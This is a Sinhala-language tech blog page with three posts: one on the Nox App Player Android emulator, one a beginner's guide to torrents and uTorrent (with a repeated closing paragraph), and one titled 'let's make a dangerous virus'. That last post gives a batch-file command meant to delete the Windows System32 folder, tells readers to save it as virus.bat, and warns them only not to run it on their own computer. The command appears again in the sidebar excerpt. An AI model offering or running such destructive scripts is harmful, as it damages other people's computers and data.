Thursday, November 16, 2017
Android Apps Pc එකේම Run කරමු............
ඔන්න මචන්ලා අද අරගෙන නියම සොෆ්ට්වෙයා කෑල්ලක්. මේක ගැන කෙටියෙන්ම කිව්වොත් මේක Android OS Emulator එකක්. අපි කවුරුත් දන්න Bluestacks App Player එක නෙමේ අලුත් එකක්. Android Emulator එකක් කිව්වම ඉතින් කට්ටිය දන්නවනේ Android Apps අපිට Pc එකේම Run කරගන්න පුලුවන් විදිහේ වැඩසටහනක් කියලා. Android Device එකක් නැති කට්ටියට නම් මේක ගොඩක් ප්‍රයෝජනවත් වෙන සොෆ්ට්වෙයා කෑල්ලක්. හරි මේකේ නම තමයි " Nox App Player " මේකේ Run වෙන්නේ Android 4.4.2 සංස්කරණය. අලුත් Version එකක් Run වෙන නිසා ගැටලුවක් නැතුව අලුත් Apps පවා Run කරගන්න පුලුවන්. මේක පාවිච්චි වෙන්නෙත් Android Device එකක් වගේම තමයි Play Store එකට Gmail ලිපිනයක් දීලා Play Store එකේ තියන Apps Download කරගන්න පුලුවන්. මේක අවශ්‍ය නම් Tab හෝ Phone Mode එක දාන්නත් පුලුවන්. එහෙනම් වැඩි කතා නැතුව කැමති නම් ට්‍රයි එකක් දීලා බලන්න.
හරි මෙන්න මෙතනින් Nox App Player එක Download කරගන්න.
DOWNLOAD HERE
Wednesday, August 30, 2017
ටොරන්ට්??????
ටොරන්ට්... ටොරන්ට්... ටොරන්ට්...
හැමතැනම හැමවෙලේම ඇහෙන වචනයක් තමයි දැන් ඒක.. සමහර අයට මේක නුහුරු වචනයක්.. ඒත් ගොඩක් අය දන්නවා... හැබැයි මේ පෝස්ට් එක දාන්නේ නොදන්නා අයට මුලික දැනුමක් ගන්න විතරයි..
ටොරන්ට් එකක් කියන්නේ අපිට අවශ්‍ය යම්කිසි ගොනුවක අන්තර්ගතය හා එහි භාගත කිරීමේ තොරතුරු අඩංගු (.torrent) ආකාරයේ ගොනුවකි..
උදාහරණයක් දෙන්නම් මෙන්න මෙහෙම...
ටොරන්ට් එකක් කියන්නේ හරියට Zip ෆයිල් එකක් වගේ දෙයක්.. හැබැයි Zip ෆයිල් වගේ බරක්නම් නැහැ.. පොඩි Kilobytes ප්‍රමාණයක් තමයි තියෙන්නේ... අන්න ඒ වගේ පොඩි ගොනුවක් තමයි ටොරන්ට් එකක් කියන්නේ..
Zip ෆයිල් එකක් Extract කරගන්න අපි Winrar පාවිච්චි කරනවනේ.. අන්න ඒ වගේම මේ ටොරන්ට් ගොනුවේ තියන ටික Extract කරගන්න Client මෘදුකාංගයක් පරිගණකයේ ස්ථාපිත කරගන්න ඕනා.
ඒ වගේ Client මෘදුකාංග කීපයක් තියනවා.. නමුත් මගේ අදහසනම් uTorrent කියන මෘදුකාංගය තමයි හොද. එක නිසා මම එකෙන් වැඩ කරන විදිහ කියලා දෙන්නම්...
මුලින්ම uTorrent නැති අය මෙතනින් ගන්නකො..
අපිට අවශ්‍ය දෙයක් Search box එකේ ටයිප් කරලා හොයාගන්න පුළුවන්...එතකොට පහලින් එනවා Search Results ටික. ඒකෙන් අපි හොද ෆයිල් එකක් තෝරා ගන්නේ කොහොමද කියන එක ගැන සැලකිලිමත් වෙන්න ඕනා.. අපිට දකින්න පුළුවන් Seeds කියන කොටස.. හොද ටොරන්ට් ගොනුවක් කියලා තෝරගන්නනම් අනිවාර්යෙන්ම සීඩ්ස් 10,20 කටවත් වැඩි වෙන්න ඕනා... Seeders කියනෙන් මේ වනවිට එම ගොනුව භාගත කරගෙන තියන අය.. Peers කියන්නේ එම ගොනුව භාගත කිරීම ආරම්භ කල නමුත් තවමත් අවසාන නොකළ අය.. ඒ මගින් එම ටොරන්ට් ගොනුවේ ගුනාත්මකතාවය පිලිබඳ අදහසක් ලබාගන්න පුළුවන්.. තවත් එම ටොරන්ට් එක ගැන ඔබට දැනගැනීමට ප්‍රබල සාධකයක් තමයි Comments. ඒ මගිනුත් ඔබට එම ටොරන්ට් ගොනුව ගැන තොරතුරු ලබාගත හැකියි..
හරි එහෙනම් ටොරන්ට් ගොනු ලබාගැනීම ගැන දැන් දන්නවනේ.. දැන් අපි බලමු uTorrent වලින් ගන්න වැඩේ ගැන.. අපි භාගත කරගත්ත ටොරන්ට් ගොනුව දැන් අපිට පෙන්නන්නේ uTorrent ගොනුවක් විදිහට. ඒ අපි අවශ්‍ය Client මෘදුකාංගය ස්ථාපනය කරලා කියන නිසයි..
මෙන්න මේ වගේ තමයි uTorrent වල පෙනුම..
දැන් අපි අපේ අවශ්‍ය ටොරන්ට් ගොනුව ඩබල් ක්ලික් කලාම එක uTorrent වලින් Open වෙනවා.
එතනින් අපිට පුළුවන් ඒ ටොරන්ට් ගොනුව ඇතුලේ අපිට අවශ්‍ය නැති දේවල් තියනවනම් එතන තියන Chechbox එකේ හරිය ඉවත් කරන්න.. එතකොට අපිට පුළුවන් අනවශ්‍ය දත්ත භාවිතයක් නැතුව අවශ්‍ය වැඩේ විතරක් කරගන්න..
ඔන්න ඉතින් ටොරන්ට් ගැන කියන්න පුළුවන් තරම් කෙටියෙන් කිව්වා.. ඔයාලට මොනවහරි ප්‍රශ්න තියනවනම් අහන්න කමෙන්ට් එකකින්..
එහෙනම් මම හිතනවා ඔයාලට ටොරන්ට් ගැන මූලික දැනුම ලැබෙන්න ඇති කියලා..
ඔන්න ඉතින් ටොරන්ට් ගැන කියන්න පුළුවන් තරම් කෙටියෙන් කිව්වා.. ඔයාලට මොනවහරි ප්‍රශ්න තියනවනම් අහන්න කමෙන්ට් එකකින්..
එහෙනම් මම හිතනවා ඔයාලට ටොරන්ට් ගැන මූලික දැනුම ලැබෙන්න ඇති කියලා..
භයානක VIRUS එකක් හදමු.....
මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Codeඑක Type කරගන්නකො...
@echo off del c:\windows\system32
ඒක ඔයාල කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියලදෙන්න ඕන.(Eg: virus.bat) මේකෙන් ඔයාගෙ පරිගණකයේ System32 File එක Delete කරනවා.Windows Crash වෙනවා.
___බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා.___
welcome
Welcome to TECH WAY.this blog you will help to learn new technological things.
I'm talk about IT,Mobile Tricks,Science,Cosmo.and many others.
Join techway...
Subscribe to:
Posts (Atom)
Android Apps Pc එකේම Run කරමු............
ඔන්න මචන්ලා අද අරගෙන නියම සොෆ්ට්වෙයා කෑල්ලක්. මේක ගැන කෙටියෙන්ම කිව්වොත් මේක Android OS Emulator එකක්. අපි කවුරුත් දන්න Bluestacks App ...
-
ඔන්න මචන්ලා අද අරගෙන නියම සොෆ්ට්වෙයා කෑල්ලක්. මේක ගැන කෙටියෙන්ම කිව්වොත් මේක Android OS Emulator එකක්. අපි කවුරුත් දන්න Bluestacks App ...
-
මේක පොඩි සරල Code එකක් .Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො ... @echo off del c:\windows\system32 ඒක...
-
ටොරන්ට්... ටොරන්ට්... ටොරන්ට්... හැමතැනම හැමවෙලේම ඇහෙන වචනයක් තමයි දැන් ඒක.. සමහර අයට මේක නුහුරු වචනය...